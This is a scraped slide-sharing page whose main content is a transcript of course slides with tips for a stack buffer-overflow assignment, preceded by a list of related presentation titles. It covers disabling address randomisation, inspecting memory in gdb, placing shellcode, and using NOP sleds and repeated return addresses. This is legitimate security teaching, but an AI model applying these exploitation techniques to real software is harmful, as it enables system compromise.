Several Tips on Project 1

Slides:



Advertisements
Similar presentations
Smashing the Stack for Fun and Profit
Advertisements

Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.
Introduction to Information Security ROP – Recitation 5 nirkrako at post.tau.ac.il itamarg at post.tau.ac.il.
Gabe Kanzelmeyer CS 450 4/14/10.  What is buffer overflow?  How memory is processed and the stack  The threat  Stack overrun attack  Dangers  Prevention.
CSC Timers Since this is a microcontroller it mainly finds itself in embedded devices Quite often embedded devices need to synchronize events The.
Buffer Overflow. Process Memory Organization.
Netprog: Buffer Overflow1 Buffer Overflow Exploits Taken shamelessly from: netprog/overflow.ppt.
Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Maziéres, Dan Boneh
OllyDbg Debuger.
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
Buffer overflows.
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.
Assembly, Stacks, and Registers Kevin C. Su 9/26/2011.
Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)
Exploiting Buffer Overflows on AIX/PowerPC HP-UX/PA-RISC Solaris/SPARC.
Buffer Overflow Computer Organization II 1 © McQuain Buffer Overflows Many of the following slides are based on those from Complete Powerpoint.
Brian E. Brzezicki. This tutorial just illustrates the underlying concepts of buffer overflows by way of an extremely simple stack overflow  Most buffer.
CNIT 127: Exploit Development Ch 4: Introduction to Format String Bugs.
CSCD 303 Essential Computer Security Spring 2013 Lecture 17 Buffer Overflow Attacks.
Lecture 8: Buffer Overflow CS 436/636/736 Spring 2013 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)
CNIT 127: Exploit Development Ch 4: Introduction to Heap Overflows
Stack-based buffer overflows Yves Younan DistriNet, Department of Computer Science Katholieke Universiteit Leuven Belgium
What is exactly Exploit writing?  Writing a piece of code which is capable of exploit the vulnerability in the target software.
Computer Organization 1 Instruction Fetch and Execute.
Part I The Basic Idea software sequence of instructions in memory logically divided in functions that call each other – function ‘IE’ calls function.
Introduction to Information Security ROP – Recitation 5.
CS 155 Section 1 PP1 Eu-Jin Goh. Setting up Environment Demo.
Reminder Bomb lab is due tomorrow! Attack lab is released tomorrow!!
Information Security - 2. A Stack Frame. Pushed to stack on function CALL The return address is copied to the CPU Instruction Pointer when the function.
EXPLOITATION CRASH COURSE – FALL 2013 UTD Computer Security Group – Andrew Folloder csg.utdallas.edu (credit: Scott Hand)
Analyzing C/C++ Vulnerabilities -- Mike Gerschefske.
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2014.
Introduction to Information Security
Refs: rootshell, antionline, your favorite hacker site…
Buffer Overflows ...or How I Learned to Never Trust the User
Mitigation against Buffer Overflow Attacks
Buffer Overflow Walk-Through
Winter 2009 Tutorial #6 Arrays Part 2, Structures, Debugger
Introduction to Information Security
CSC 495/583 Topics of Software Security Stack Overflows
Microprocessor and Assembly Language
Protecting Memory What is there to protect in memory?
Protecting Memory What is there to protect in memory?
More GDB, Intro to x86 Calling Conventions, Control Flow, & Lab 2
Introduction to Information Security
CSC 495/583 Topics of Software Security Stack Overflows (2)
Chapter 4 Addressing modes
Recitation: Attack Lab
Buffer Overflow Walk-Through
CMSC 414 Computer and Network Security Lecture 21
Announcements Homework #7 due Monday at 3:00pm
SEED Workshop Buffer Overflow Lab
Advanced Buffer Overflow: Pointer subterfuge
Assembly Language Programming I: Introduction
Format String.
8085 MICROPROCESSOR 8085 CPU Registers and Status Flags S Z AC P C A B
Lecture 9: Buffer Overflow*
Smashing the Stack for Fun and Profit
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2015.
CNT4704: Analysis of Computer Communication Network Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Fall 2011.
Week 2: Buffer Overflow Part 2.
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2016.
Understanding and Preventing Buffer Overflow Attacks in Unix
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2013.
FIGURE Illustration of Stack Buffer Overflow
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2010.
Week 3: Format String Vulnerability
Format String Vulnerability
Return-to-libc Attacks
Presentation transcript:

Several Tips on Project 1 Be sure to use the Makefile to generate executable of both exploit program and target program Be sure to use “setarch i686 -R” in front of every execution, including both Gdb and ./exploit You can use “x/b address” under gdb to know the byte content saved on the specified address. This is helpful to determine big-edian or little-edian of memory (how to overwrite return address). You can use “break foo” to set breakpoint upon entering foo() function. Fill the shell executable code (in the string array shellcode[ ]) byte-by-byte into the buffer for your modified return address to execute. The deadline will not be changed, but penalty for one week late submission is now 10% off.

NOPs Most CPUs have a No-Operation instruction – it does nothing but advance the instruction pointer. Usually we can put a bunch of these ahead of our program (in the string). As long as the new return-address points to a NOP we are OK.

(exec /bin/ls or whatever) Using NOPs new return address Real program (exec /bin/ls or whatever) Can point anywhere in here nop instructions

Estimating the stack size We can also guess at the location of the return address relative to the overflowed buffer. Put in a bunch of new return addresses!

Estimating the Location new return address new return address new return address new return address new return address new return address Real program nop instructions

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.